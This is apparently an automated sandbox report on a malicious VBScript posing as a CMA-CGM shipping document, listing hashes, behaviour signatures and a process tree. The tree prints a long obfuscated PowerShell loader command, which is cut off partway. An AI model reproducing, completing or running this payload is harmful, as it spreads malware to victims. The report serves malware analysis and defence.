e7a896d4450aa9218ba34fcaeb6a542837b6087ba16968ad870b73ae1d7b552e

General

Target

CMA-CGM-ORIGINAL-BL-MSKA3848577211.vbs
Size

512KB
MD5

9c521a937174b0166b39db97ea79a254
SHA1

b89633cbbd6bfb3cafc2c7b1824cf32c4671fdc2
SHA256

e7a896d4450aa9218ba34fcaeb6a542837b6087ba16968ad870b73ae1d7b552e
SHA512

1495d188f786bb29ce3aaca6e203f3b7c86790106243820a67591acb68c5a0222a512e1fc45cfd1b85c3c5a314b783f3da4301c78e8be1b465f63c8abbbc95f9
SSDEEP

12288:1nKPi06eJhmbSPqC7iDXXy1xGAj7Ka4BUPzCnT:1nRSdiW19qDT

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1284	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
968	powershell.exe
1936	powershell.exe
1512	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1284 wrote to memory of 968	1284	WScript.exe	27
PID 1284 wrote to memory of 968	1284	WScript.exe	27
PID 1284 wrote to memory of 968	1284	WScript.exe	27
PID 968 wrote to memory of 1936	968	powershell.exe	29
PID 968 wrote to memory of 1936	968	powershell.exe	29
PID 968 wrote to memory of 1936	968	powershell.exe	29
PID 968 wrote to memory of 1936	968	powershell.exe	29
PID 1936 wrote to memory of 1512	1936	powershell.exe	31
PID 1936 wrote to memory of 1512	1936	powershell.exe	31
PID 1936 wrote to memory of 1512	1936	powershell.exe	31
PID 1936 wrote to memory of 1512	1936	powershell.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CMA-CGM-ORIGINAL-BL-MSKA3848577211.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tumultuous = """TeFMluSpnQucRktFriTeoLonAv JuHTyTOxBkv Ul{Ps Di Sk Hy MipTiaGrrMoaXamga(St[UnSbltCarViiHjnAmgSk]Sl`$CadMaoTilJokSahbraTrlGeeTesTr)Lu;No Tr Ri ta Op`$KaTOcoRunkoiSkcGekHuiunnBugTe4Ir9St Ou=Un DeNSieSiwVe-deOUdbCujUneSkcIntAn UrbHuyAhtkoeAn[Pi]Un dy(Hu`$BudStoDklvikIshViaOelRaedasFa.MoLUneSinBagBetbehRu Gy/Mo Ba2Ba)Sy;Mi Pa So Su StFDioNerVe(Ng`$FsBleeAesHeoEltBisHi=Be0Le;Ti Bl`$inBVeeAdsBroEstphsIn Af-BelVatHj Ry`$UddStoBelSpkLohflaSvlNaeOtssc.NaLSaeBrnSlgsltskhSk;Ek Di`$BoBVieRnsNooOmtSnsRe+Br=Ot2Sp)Ep{Tw Sk Sa De Da Da Ku sk Se`$PaTFuoWanMaiFrcRekRiiTrnNegIn4St9Sk[Mo`$BeBPeeSksStoSotPlsMo/Ta2St]ru Py=Fo St[BicfioBanBovBeeSkrFitIr]ta:De:CoTDeoKiBReylctVdefl(Ti`$BudProKolEnkUfhStaHjlTueDesAf.PlSAtuTrbEgsSttHarSpiAnnStgPy(As`$SeBBieIbsKroSptPasNs,ha Ab2Re)is,Me Ev1Ov6Al)ge;Cr Ma Pa`$EkTCioPonStiUncLykToiKanSygSp4Co9Hy[Be`$StBMaesosPloVetDesCo/Bo2Re]Te Do=Gl Ir(El`$InTUnoTenkaiKrcEikPhiFrnRugRe4Ac9Br[Op`$VaBomeDjsPioUvtPasEn/As2ce]Ef Di-GlbBrxProOorZo ro8Sa3Mu)Aa;Ov Hu ud Zy Be}Or Br[AfSSttSerBiiOvnCygne]Ra[vaSFoyPesPstSyeAcmLu.PyTHaeHuxNotBr.teEDinBacGaoTadreiFonIngko]Sy:Br:DeATaSClCDeIArIBi.NrGWiebetSeSDutFrrVeiArnChgre(ro`$ReTCioSanSaiGecPakGaiBrnCogAl4Ea9Se)Tv;re}Mu`$BeNAloouvSpaLutTriBuoBlnadeMinSpsAv0Ry=NaHEcTOvBBa Fo'Gy0sv0Sm2LuAPr2Gu0Fo2Ju7Ra3Se6Sk3HaESy7foDAf3Fo7Sy3WhFAr3AdFDo'Po;un`$KlNSkogevDoaFrtQuitioConWaeTynBosRa1Sm=LoHDeTMeBMa An'Ju1StETr3ToAWe3Fe0Bl2De1Sy3InCIm2Ud0St3DaCSk3Er5Ua2Kr7An7PrDUn0Co4Wa3CoANi3FoDPy6So0Bo6Da1Tr7ToDDa0Af6Sv3StDBl2Pu0Di3Di2Da3St5Po3Un6sc1BaDHe3Si2Un2Re7Ba3suAFo2An5No3ty6Cr1AmETh3Dr6Ot2Ka7My3OnBBl3FoCPu3Ka7Om2Ba0Al'Ov;un`$paNOpoNevflasotSiiKboCanPoeIsnDesMa2Ex=FeHHeTKaBRe Bi'Mo1Po4Pi3Sp6Dr2Un7Se0Be3Re2Re1Ku3TiCJe3De0Gl1El2To3Ot7Ln3Eu7Tr2Ka1An3Pr6Ud2Ud0Ud2Im0de'Co;De`$StNBooVrvSaaCotTriReoognBaehenGlsWh3My=kiHXaTPyBAd Vo'Wa0Gr0El2SpAAp2In0in2Fu7St3Ka6Sa3GrEsq7UdDDr0An1Cr2Un6We3ReDMo2Sj7En3HaASy3FrEOm3Do6Br7UnDFr1IcARe3TiDTr2Lg7Am3li6La2Ho1Fa3CeCAn2Re3Fi0St0Qu3Ta6Un2Ad1Ba2Fo5ho3SaAVi3Di0Ma3gl6Ju2Ma0Ad7LeDUn1PrBEv3tv2An3UnDAa3Ma7To3BrFCe3Co6Ac0De1Bo3Te6Ov3Fa5Ug'Re;So`$SkNUkoHevMaaCotSliRyoSankeedinAisTo4Su=SyHFrTHaBMo St'Ju2Br0Lu2Tu7Gi2Ch1En3MaAap3UnDFo3Qu4Fe'St;At`$SaNDroSlvYnaPotbiiDaoConEneUdnNesFi5Ef=StHNaTSnBIn au'Sc1Lo4Bl3ef6Un2as7Sk1StEGt3stCBe3Gr7Lo2Ur6Vg3DmFUn3Ra6Si1BoBIn3co2ap3VeDAf3Vi7Mo3LaFdi3Ma6In'Ni;Ji`$BrNUnokavBiaPhtSaiThoChnOpeFynTosJa6Me=VeHInTmaBgu Ga'He0Fo1Ga0Mu7Ce0Sn0Ma2Pe3Pe3Af6hr3Br0No3MoALi3Ls2Ou3MeFSi1NoDAn3En2El3SeEDi3Ta6Fu7ShFDe7Ul3Sk1ArBAa3TeASk3Be7As3gl6In1Ap1Ep2SuAFi0At0Op3MoASk3Le4Fa7TeFIn7Ci3Er0Pa3Ch2Si6Af3To1Sk3CaFUd3KoAKu3Fo0sk'Si;Ja`$RuNEnoAlvPiaAdtMaiauoEjnReeOunGasKn7Di=FiHUnTNiBTo Sn'Sy0Ga1Te2Un6Nr3SuDFo2Bo7Fu3PuANe3FuESk3Al6Ro7PoFBe7Se3No1ExEGo3Le2Rg3EuDTr3Tu2Ci3Pe4Pe3Fr6Fo3Ab7Ra'Un;Tr`$CaNHeoAfvDuaPitSaiSpoHanEneBrnresOp8Bo=mrHVeTKnBAn St'Sk0sw1mi3Ut6Op3Ha5Un3CoFre3Su6Ny3Ti0Om2Ed7Ss3ha6Si3Di7Sp1ru7Or3Fo6Af3AdFAl3Ho6Va3Af4lo3Bo2de2Ro7Tr3Aa6Su'Bo;Le`$NoNMuoGovulaSutJuiMeoDonIneAvnBisHj9Ny=EfHToTOvBIn Sl'Be1TaAFa3CaDBe1SaEHa3Dr6Bo3NeETa3ToCSp2Im1Ud2ToAdi1UnESu3PrCme3Ut7Oc2Sw6Bi3StFHa3He6Se'Be;Lu`$OrpInoMetCasBehatoUnoBotEn0Cl=ReHSeTgiBPu Sp'Pr1FoEAl2GlAGe1Pr7Di3St6Un3AnFal3Fr6Ve3Sc4Fr3hj2De2Om7Gr3Lu6Mu0St7Mo2SkASa2Sh3Li3Va6In'Mo;Tu`$BepMhokntbesouhDaoTaoLatSu1Ko=SpHBeTSvBFr be'Bi1Ba0Ca3InFSo3Re2Be2St0Mi2ha0hy7SaFVa7St3Ep0Tr3bl2Sk6Su3Em1St3EtFAf3BeAAl3Tr0No7LaFCo7Va3Un0Do0Sa3El6An3Lu2Fo3SiFIn3In6Sg3wi7Sn7DiFKr7Di3Do1gu2Pe3ScDCh2Le0Pr3FoAHa1Sa0Re3brFFo3Kl2Pe2Al0Eu2Me0Op7TuFUn7Wh3Mo1Op2Bo2Di6si2Sl7Ru3OmCSe1He0Me3WiFpr3St2Ko2Al0Di2ot0Ay'Sj;Re`$DepShoMotFisfohApoAcoUdtfo2Un=FoHGoTTiBUn Ri'fo1EkAIn3SoDOu2Be5la3FiCDa3As8Sk3Pe6Vi'Wh;ke`$RvpSqoHgtSasPuhUhoBloSmtSu3En=afHStTstBir Un'La0Fr3Il2Pi6Ec3Ur1Un3HuFTi3LiASl3Ov0Ke7UnFTh7Be3Sc1CoBDr3GaARg3Ad7Hy3Mo6Au1Fl1ha2mlADe0Ud0Do3rsAMe3Sa4Ca7BlFVa7Um3Nu1FlDCr3To6Eg2bo4Aa0No0Fa3crFJr3BaCNa2me7Ek7SeFSk7Sp3Br0Vu5Pe3FrAAf2tr1ci2Ti7As2Sa6Go3Pr2Ko3NuFEn'La;Ko`$GspWaoInthnsNehPeoIsoEptSu4An=EmHkoTPaBUn Sk'Gr0Au5Es3UnAUg2Fo1Co2Fi7Be2Sk6Ti3Fa2St3UdFDe1Va2Ul3BaFSt3TiFMu3UnCSp3Pe0To'Ta;So`$CupWioNitSssThhJeochooptTe5Ra=OpHInTPoBAf ud'Di3BiDBa2En7Ko3pu7Pi3SkFDi3WoFEi'My;Ir`$napOvoTrtScsPihFloReoRetli6Po=HeHGuTEsBCo Sv'Ob1jvDBr2Hy7Un0Sp3Te2Sh1Ag3MiCEf2Ho7Au3Me6kl3De0Hy2Di7Fe0Pr5Ld3ChAov2Hv1an2fr7De2Ud6En3Un2Fo3cuFTa1DiEGa3Ar6Mi3MeEPa3SaCTo2Se1Mi2DaAAr'In;Kv`$FopFooGftHesMahProdaokotPh7Le=FoHLiTReBsn Ko'Da1NeABe1Ma6Hy0NyBPu'Un;Ze`$PrpUnoNetPrsCahGeoMaoKatNi8Ar=AgHElTBaBIm kr'Me0TiFNa'Jo;Sp`$MyUSkpNolSaaBryNr=FrHFoTTaBLt Di'ch0Ud6Ma0Sa0Cl1Ig6He0Ta1Be6Po0Dv6rr1No'Co;Mu`$SaSUleFoptatPeeSntFatEreJusCa=GuHSeTUnBOt St'Fa1Hj0Fo3Re2Ca3HaFSn3HgFPr0Pl4Un3SkAbr3FiDPu3Ha7To3AfCde2Fo4Su0Bo3Un2St1Di3BeCEm3Ba0Sc1st2Ph'St;jefGruRinDocAatReiWhoApnDe FofAfkTapKr Tu{FoPSkaSyrCoaAnmZi Mi(Co`$FaVRiaNekColWoestnPtdHaearsMe,Il Ap`$GuOUnvCaeAnrBinGuaHytStnVaiNonTrgDisTusEutIneCedFaeDrrFlnnoePo)Po Em Dw An Pa Or;Sk`$obPRerMaoUtgGarSiaUnmBlmVaoMadOtuBrlNeeBorHo0Ro Ho=DuHbuTDiBBa Ps'Pr7Di7Di1Ro4Co2Un1De2Fl6Pr3Be4Kn2Ha1St2Ru6Co7Co3wr6SoEBa7Za3Le7MaBph0Yd8Sp1No2St2Fr3pr2Fi3Pe1Ch7Si3GrCSo3ExEAn3Se2Pu3SaAOd3UnDSe0hiEGa6De9Gr6Un9No1De0Sp2dr6St2Sy1ov2Pe1Ch3Ma6Af3FoDAn2Lo7Hu1Un7po3DiCEc3SeENe3Da2Si3FoASi3BjDSk7PrDIn1Hj4Ra3Sy6Ha2Pa7Fi1Ef2Vi2za0Pr2Si0Fi3Kn6He3GeESi3Ar1Te3BeFSm3amAEn3Ti6Tr2Ba0Us7PrBDi7RoAFa7Dr3Fl2EmFEm7lu3Id0re4Ba3ClBSt3Te6In2Sw1Mo3Va6Ne7ArERi1AcCMr3Me1Dr3ul9sa3Fl6Bi3Ib0Kr2Dr7er7Cy3Co2Sl8Pr7Mn3Op7Mo7Sy0CoCNa7SeDSk1do4Sl3SeFFa3StCLi3So1Le3Ba2Ov3afFTr1As2si2id0Li2Kl0Ki3Fo6Ge3SkEKe3Fo1Yv3PaFFi2StAVe1Re0Ha3Pa2Ma3Sk0Fi3lyBAm3Jg6Fr7Un3Re7HnEMe1Ti2En3DrDUd3De7Lr7Fr3St7Le7An0StCTr7SpDBa1EkFGr3KrCpr3Be0Ei3Br2Ub2Ha7Di3LuATa3OdCSu3foDMy7StDRe0Tr0Pe2uf3Te3MaFTe3KeANo2Pe7Ao7MiBAl7Fd7Tr2De3Pe3DiCCo2Se7Me2Ke0In3TrBDe3SyCFa3unCLa2Ea7Ko6KrBBe7DeAJo0Mi8Pa7MeEWo6Re2Fi0PeEPa7JuDAl1In6Un2Te2Ti2pi6Tu3Se2An3ChFUn2Pr0bl7SpBDi7Ti7Ps1SuDAt3PaCCr2Tu5Ko3Hj2Ve2Wi7Es3FlAOp3BoCLa3PaDSt3Av6Bo3CaDSt2Pj0Nu6sh3As7HoADu7Ek3Eu2beEFr7UdAEs7GaDSa1Lu4Ov3Sk6zu2Ne7St0Ro7Re2PsAFo2Ge3Fi3Pr6st7laBPu7Mi7De1BrDOr3SpCRe2Fo5Ap3Ve2ti2Ej7Ki3NyATi3AlCAi3UnDUn3Sp6Fa3seDJo2Su0Fo6Ru2Om7OpAAl'Re;Yo&Sk(Sp`$AspKnomotNosSkhUdoUaoArtGl7Ka)Na An`$LaPEfrBeoAngLrrStaScmUnmStoFrdHjuBolPreHyrPu0St;Sc`$GaPBorGloregMerCoaRimSimReoUmdOvuCalDoeForEn5Ty Lo=St UnHquTPrBIn Ja'Ta7Fr7Je1SuFCr2DuAfl3Fl8Qu3Fr8Et3Sa6Pr3fo7Pu2Bu1Ov3VaEUs7Ep3Un6InENa7Bl3Pa7In7Ha1Fr4Sw2Ty1Ge2Qu6Pa3Co4Su2Vi1Sp2Ad6Lg7loDIn1Tu4Fe3Fe6Hu2wi7Af1dyEAp3Ba6Wa2Bi7My3PeBUn3KoCDd3Ha7Fo7KoBBr7Di7Sm1AsDTr3AtCPo2Wa5Bi3Is2ba2An7un3PhASp3CyCEn3arDde3Ch6Fo3miDAm2Si0An6Fo1Ga7DoFva7Li3Ef0Fo8Fe0En7fa2caAho2Tr3Go3Ra6Gl0Un8Re0PoESp0BrESk7El3Ca1Wh3He7FoBEt7Ga7Un1ShDHi3trCUn2Al5Se3Ha2Ec2He7Al3BeASi3ViCSi3TaDGa3Af6Ti3VeDla2Ha0Go6Am0Ti7PeFUn7ko3Ga7Ho7Fr1SuDTa3AgCPl2Br5Sp3Tr2Re2Fa7Fr3DeASt3CyCTe3RaDTr3In6He3KrDSp2El0Pa6To7El7SpAAb7SaAUn'Be;to&Aa(Br`$DepReoFotafsGohEloEaoNdtgl7Vi)Hy Un`$MaPSurFooLogsyrClaGhmDemTroRedVaulolfoeEnrki5Be;Ca`$AlPThrPhoMagSjrRgaAcmBrmHaoSpdVeuUnlsteAurTe1Si Dr=St HoHFrTBiBLe No'Bi2Hy1Gt3sm6No2Na7Pr2ba6Tr2An1Fi3LeDhe7Ci3Sk7Ac7Ku1TiFOp2FrARh3Li8Li3On8lu3In6Pi3Di7De2Su1Em3AnEBe7SlDWe1PeATa3piDPa2Ee5Fr3StCEm3Zi8Fo3Va6Ko7OpBNe7Ba7No3SwDCr2La6Le3KrFNo3SoFaf7UoFSy7Be3Ba1Hv3Er7EkBop0Fe8Me0Ci0Un2PrANo2Th0Up2Me7Ha3Sc6Th3DeEra7WiDFn0Ho1su2Mi6Ly3NiDRe2Ku7Br3VaAPr3KaEAn3Kr6La7HeDTr1UnATu3GaDCa2Ri7Me3Gr6Ra2Hj1Wi3AnCSp2Dd3Se0Mi0To3Gr6Fo2Sn1Ma2Su5Re3SeAEl3Di0po3Pr6Su2Ox0No7SvDSh1DiBSc3Di2fl3DiDSu3Mu7Pa3ThFBl3ma6un0In1Gl3Pe6Ya3Ro5Pi0LyEHe7AnBLe1MeDLe3Sa6Un2Le4Aa7AnEbo1BlCPr3Th1Si3Bu9Ti3Af6Ta3Ca0hi2Su7Mo7pi3ep0Be0Co2DeAFr2Lu0Ud2Re7fy3Ex6Kb3ReEUd7paDPh0Ha1Un2Af6Pa3TeDAn2Pe7Pl3ImAFo3DaEUn3In6Po7PuDAf1BeAFr3IpDTe2Un7la3Se6Ud2Sh1Bi3SeChu2Ab3Un0Ce0Da3Ju6Ho2Ud1Br2Me5Ma3LoAfo3Pr0Gi3Br6Pr2Me0ir7SnDCr1KiBde3Cr2Wr3IbDOv3Re7Re3smFPu3Bi6Sl0lo1Ga3Sa6Tr3Ni5Fu7KeBSp7DiBFo1oyDGu3al6Di2Ou4Mo7AeEBi1SiCDi3Te1An3Er9Mo3Ol6in3Pt0Af2Mi7Em7Ko3ka1KbASp3BuDPe2Du7Ad0So3Ma2Sv7Lo2Im1Lg7stAst7SuFPi7So3Ka7EkBCo7Na7Tr1Be4Up2Co1co2De6In3me4Tr2no1Zi2Fu6Be7PeDHa1Sa4Mi3Ab6Fr2Sn7pr1RaEPo3Fl6Hu2Mo7La3BlBUn3urCLa3Af7Ov7TrBPh7An7Sc1HaDpt3EgCUr2Je5Ra3Ca2La2el7En3CoAas3PaCUd3reDBa3Un6Ru3InDDe2Pa0Ha6Ph6Eu7AsAFe7SiAJa7OpDte1UpATu3KeDSu2Sc5Ln3PrCLa3Fo8Sy3De6Di7DeBPe7Br7Cu3MuDRo2Mo6Pr3SiFTe3OrFOv7PuFCh7Al3Af1Af3Ra7TrBTo7Ko7Un0In5La3Hy2Fo3Pa8Br3HyFTa3Ef6Of3SyDIn3Va7Tv3Ki6ha2De0Ue7inASm7SkAFo7FoANe7ZiAAf7ShFTr7Ti3qu7Fo7ya1DuCGr2Cu5Rt3Ov6Ne2Oc1Pa3SoDNe3Ho2Sv2Af7Re3UdDLi3NoASa3SlDst3De4Do2Sn0un2In0Ln2ho7Su3Da6El3sp7No3Vr6Ri2An1In3ChDIn3Co6Sc7UdAEn7PoAUd'Fi;Pr&Gu(Ou`$PupHooArtLisAlhAmoNooAntNu7Ou)Re St`$InPDerSkoRegBrrTeaMamHamCooBrdspugalKueNorLs1Ad;Lu}TcfVeuOfnbocBotSiiHuoJanUd daGCaDBaTWa Me{SePFoaFlrMoaSkmPe Pl(Pl[FoPNyasurLuaSpmKaeCotBoeOvrGt(AbPTeoOvsfliTetAriStoconDu Va=St Se0In)ma]En Rk[JuTUbyMapKyeSu[ud]eg]In kl`$LutHaeSelEjeAsgSarSkaTemBebReuadrEkeCaaSauSyeBetSh,Kv[GePLiaunrJeaFomPreFjtUneAlrAn(epPUnoBesReirotToiwaoGenHa fi=Dr El1Sr)Ta]Ph Pr[AnTEnyRupNaeCr]Un Ov`$thHSurOpnziiHonNogSo Ga=Un ge[KoVBeoBaiindTs]St)er;Cy`$SkPAgrIwoSogPorTiaOpmPrmKooAfdKouTrlNoeKorOp2Ap Wi=In PuHVaTDaBSp Ge'Sp7Pi7Ri1No5ut2Ka1So3sk2Sk3ObDUn3fi8ch2VoACo7Ru3Sa6ViESp7Ba3Re0Wh8Ba1pi2Ge2Ud3Fo2Co3Fl1Hy7di3ZaCSc3DiETh3Pa2Un3ApABi3PaDGr0BlEFe6ap9Ud6Ud9Da1An0Sc2Ea6Mo2Sh1ad2Da1Ti3St6Sk3HoDCo2Cy7Sv1In7Co3SuCsp3sfEBa3mo2Ge3CoAAf3InDSo7VeDDo1sh7Sl3pa6Sk3Me5Fa3AtACa3RiDLa3Pr6Co1Hv7Tr2BaAGi3OpDSe3Pl2Fe3ReERa3ToAAn3Op0Pa1Fn2Ra2Pa0Or2Di0Ce3El6Ev3ToEte3Bl1Ga3SkFfo2BaAUn7EcBSk7GoBUn1NoDTo3Va6Un2Fa4Af7AuESu1RaCby3Ma1Im3Fl9Fo3Se6Ex3Un0Dy2Sk7De7To3Ex0ko0pa2diAMe2Ha0Be2So7Du3Pr6An3BeEHu7BrDBa0Eu1Or3Sc6Se3La5Om3ExFFo3Co6co3Su0Fe2He7Tr3UnAFo3OcCEm3RyDLa7MeDTu1Sh2Al2Un0De2Sr0Ca3Bl6So3MoEGa3An1Tu3EsFIn2RgATo1WiDMe3He2St3StECy3Ma6Es7MoBTe7Fd7fi1RhDGo3PtCEe2Du5sk3Br2Fo2To7Fi3RaAFa3RcCfr3ocDDi3Ch6Ge3TrDVa2Be0Sp6SoBHi7StASu7StABa7UdFVo7Tu3Ad0Ma8Ma0Su0in2BuACh2Pr0Mu2Cy7Mi3Pr6Gu3LyECh7SkDEn0Fr1so3Dr6gu3Te5Ta3HnFBr3No6Be3Au0pa2Fi7Hu3KoATh3OpCCh3IbDFj7NoDAb1Hi6Fi3DeEJu3HuAHa2Am7Pe7BeDTr1De2Un2Ud0He2su0Je3Un6Fi3ArEKe3Bl1Sa3CoFTy2FlANe1Sr1Kl2Al6Be3AcAPa3TiFMa3Su7St3Ve6Ka2An1Ta1Im2Re3Lu0Pi3St0St3Ru6Ko2Ch0Co2An0Su0GiEEx6Ho9Re6Eg9Re0Ri1Un2gl6Un3TaDFu7usAga7CaDSa1Su7Ge3an6Ta3Ba5So3UnATr3OrDFd3Ux6Kr1Ne7Es2UnAGa3BuDKr3ts2Jo3TeEPr3WeAno3Sp0su1SpEVa3ChCTo3Sn7Mn2Ro6Ci3ErFdy3Po6Sc7KoBTy7Kv7ou1PeDPa3ObCBa2Ge5un3La2Ul2Po7Fo3diAPr3SpCId3CoDWr3De6Ov3NdDRe2Ti0Si6reATh7DeFEu7Da3An7Ou7Un3De5Fi3Vi2Vo3ArFLs2fr0Ka3Tr6He7KoABa7reDTr1Po7Di3bu6La3Ud5Co3LaAUn3TwDRe3Sa6Ar0el7De2FiAba2Pl3lu3Dr6Fo7NaBVi7st7Ud2Ch3Fo3RrCPi2Ly7Ve2Pl0Hi3MiBNa3VaCdu3StCKi2Se7Fd6Ap3Co7BrFti7Sn3Su7Ko7Un2co3Ka3PhCIs2Ba7pr2Mo0Ba3chBFu3BeCSn3ChCNa2To7su6Ku2Ge7SpFla7Pr3Ov0Hs8Bl0re0Yn2SuAHj2Dy0hu2La7Su3Re6Vd3MoEGu7HiDLe1AnEWh2Kn6Ma3CrFCh2Fo7Ge3EuAOx3Ta0Or3Ca2La2Re0Al2Ur7Ho1My7tr3Fu6Mi3PlFUd3Co6ud3Di4Ex3Ov2Sv2Aa7Pe3Ud6po0diEPr7CeABa'Re;Sl&Ex(Ti`$OrpSloSttVasEnhCooTrosttTr7En)sp In`$SrPderHuoEggAfrGlainmWamBioTadPauSilBeeStrUl2Ha;Re`$AaPForGeoPagLirSeaOrmInmTeoPadNiuAllKaeSerAq3Tr Un=Hv TaHPlTLeBLi No'Ej7di7Un1Bl5Ve2Ma1He3Ka2Ve3ToDPh3Ra8Co2TaAAn7UnDVe1ty7Ef3Di6Va3In5ho3HaAEd3SmDAg3Pu6Gl1ga0Su3GlCEx3HaDFi2Dr0Op2Bo7Kl2in1Le2In6Ol3lo0va2La7Bg3MaCRi2Si1Sl7OvBFr7Me7Un1NeDUn3arCSo2Eu5ko3Ki2Pa2St7Lu3NoASo3AnCPe3inDJu3Ov6Ba3SeDIb2Uv0Wr6Di5Pr7MeFFo7Sk3Li0Co8Sh0ab0wo2KoASn2de0in2Re7Sa3Ga6Re3SkERu7VdDFo0An1co3Di6Ch3Al5Ly3PnFTv3Be6Ud3Re0No2No7Gr3UnAbe3TeCSk3KaDDe7DiDNe1fe0Ac3Ca2Ki3ReFCh3NiFSc3VaACo3RaDSn3Ud4Ma1St0Af3SeCpy3VgDPa2un5Bu3gr6St3BrDSe2Sj7se3StATr3LaCOn3AtDPa2Ly0Se0JeEHe6Wh9Pl6El9Pi0Bo0Ra2Mu7Ma3ki2Do3SaDB 3sl7Tv3Sp2Un2In1ba3De7Kv7inFln7Sv3Eq7Fo7Bi2Im7ud3Jo6Co3DeFTi3so6th3cu4Du2Sc1Bl3Re2Bu3NiEto3Te1Dy2Re6Do2No1Is3Gi6Aa3Me2Fo2Co6Ju3Pr6rh2Fa7Sa7DeALa7ApDFd0St0Ha3Ra6Di2Ma7Ba1AfADr3GaEBe2Pr3El3BaFCa3Be6Le3LeEPr3Si6St3doDRe2Dm7Mo3No2He2Pa7Af3SuANi3coCMi3UnDbo1De5In3AlFia3As2El3Au4Pa2Fe0Im7KlBcy7Es7Di1VeDSe3RaCFi2An5Ri3Pe2Fa2Gr7My3ErAAf3noCSw3epDti3Mi6Br3HeDFr2Lm0Qu6Se4Te7ArATo'Fe;Un&Ca(Un`$FiprioFitVisEshSeoTeoantBa7Mi)il Fi`$DoPDerFooRagPrrSoaSnmNomLioStdHuucolMieFrrDa3Lu;Ha`$PrPUnrReoCogKarEpaMamMomNooDidHiuEalTaePorHc4To Fi=Vi WoHMaTMeBRe Ac'Jo7Dy7Pr1do5Ps2An1Re3Wo2Tj3UdDTj3St8So2SpASt7GyDTa1Un7Ra3Fi6In3Fa5Va3AlAci3FoDud3Pa6Un1DiERu3fi6Br2He7Pr3UdBMe3OuCop3Hu7St7deBBe7An7Re2Gt3Be3MaCAn2Ba7No2De0Sa3MeBMi3NeCSt3DoCFo2Am7ot6lu1Dt7JaFTi7Wo3Fl7Fo7St2be3Wh3VaCPo2Ho7Bo2Cu0Vo3LoBMa3AgCSc3PaCMa2Va7Re6Ch0Br7NoFou7Bo3Cr7bl7Hj1OpBHj2Ge1no3PeDKi3foASt3ShDOv3Sj4Ma7HoFTi7we3Ly7op7Fu2Th7Ob3Sc6Ob3PoFOv3Pr6Wi3Re4Na2Ca1al3So2Be3anESo3Su1Kr2Ur6Ov2Ma1Na3Ku6Dr3Fl2St2At6Co3Te6Pr2Ax7ly7reAFi7FrDRe0No0Ge3Le6La2pr7Va1TrAAn3DiEEn2Fu3Ce3UnFTi3Rr6Fa3TjEVa3Be6Re3DuDup2Dr7Ga3In2Pr2Su7Pe3SuAsk3coCCo3StDSp1In5Fo3DbFDr3Bo2In3Di4Sv2Un0Co7OlBFr7sc7Ke1DjDCr3FoCOv2St5Pi3Pr2lo2Re7Wi3ArAOp3JaCAf3ArDUp3Ti6Ho3PsDBo2Ph0Ai6He4kr7blAOp'Br;Pr&Fe(Gl`$CepCioIltMysTrhProstoDetMa7Im)We Im`$OvPForGioFegLarSpathmAcmOpoFodCouPilMeeVarSe4Ps;ap`$FrPTarStoShgFarFraMimLtmseoOddjuuAclSaeInrfe5Un Fo=Ba irHHaTReBFl mo'To2Pl1Pa3Ba6Se2Br7Re2Ek6Ok2Lu1Hu3NoDSy7Ce3Kr7Af7Bo1ad5In2Ha1Ho3De2Un3StDap3Te8Ha2ApAMu7DeDVi1Es0St2Un1Ir3Fo6Jo3ge2Ge2Nu7Di3Ru6Do0No7Be2ToAHo2Tr3Ek3Ca6An7ToBTj7UnAFe'Ta;Je&pr(Ka`$PypSaoRetGisMahSaoWioAdtNe7Ny)Ly Ek`$EpPTarGeoSogAfrOuaDdmHumLioStdPeuTrlPoeUnrBo5Do Fe be Ex;Bi}Sq`$OpUPrdSopPaaTenRstUnnGoiVanPogNesIdfGyoCorHarPaeMotRinAbinonFigCoeKwrDenMieUnsFi It=Dr KuHNoTMlBSk Ty'Ho3Br8Re3To6He2Ve1Fa3LiDUn3Pe6Mi3JoFCo6Sh0Ko6Co1Sv'St;Ai`$NoPSirOvoAkgInrElaskmPrmLioUndUruVilStePurEm6Tr Im=Mi ThHCaTSpBMe Mo'Ga7Fr7Zo0Ga0Sc2Se3bo2Sw1Fr3Ca8Sy3Um8Ko3St6Th3Ch7An3Ge2Ov3AmFIn3bl6Co3LdDSt3fo6Ex2Fr0me7Ly3In6ObECo7Ta3un0Kl8Pa0Sk0Bo2AcADi2Al0Af2Af7Ge3Pl6Do3HeECa7FlDSo0ba1Et2Gl6re3SpDTh2Fo7Ja3LiAEl3DeETh3de6Un7SvDLi1VaABe3SeDVe2Ho7Co3Ga6Ka2Po1Ro3BaCFo2Am3Be0Ka0ab3Ad6Sk2Nu1Ma2Pa5re3StABi3Dr0Hr3To6Qu2Mo0Ps7InDva1crECy3Si2Ha2Be1Un2Mi0no3StBth3Sl2Pr3KlFNe0AcEda6Ta9Fo6Fd9Us1un4Tr3Do6Te2Sr7De1Co7Rh3Su6So3AdFCu3Be6Pa3Id4sp3so2Us2To7Mi3An6Me1Ja5Ra3NuCUn2Ap1Tr1Ba5Re2im6Ta3EfDVl3Ge0En2Me7Da3lsATy3LeCAn3TrDPo0Af3Be3KiCIn3HyAAn3InDsi2un7Vv3Sk6Fe2Tw1Bo7FuBdj7SyBFi3Ha5me3Ra8He2Mo3Te7Mi3Ur7Yd7Ex0Un6pe3Me7Fn2Us3en3re2St3TrDTu2Da7Vr3udDAn3KoAPo3ReDAb3Vo4Ur2Af0An3Em5Ro3AbCTe2Af1Jo2Vi1Fs3Zi6La2Va7fi3LyDMa3DeALy3JoDpe3Lu4Ge3Br6Bl2Un1Gi3HyDRe3fe6Un2Fl0Ke7Th3Un7Di7In2Fo3Ma3DiCSt2Pi7He2an0Br3MoBkv3OvCMe3NoCRu2Pl7Tr6Fo7Sa7NlATi7FoFFa7Bl3S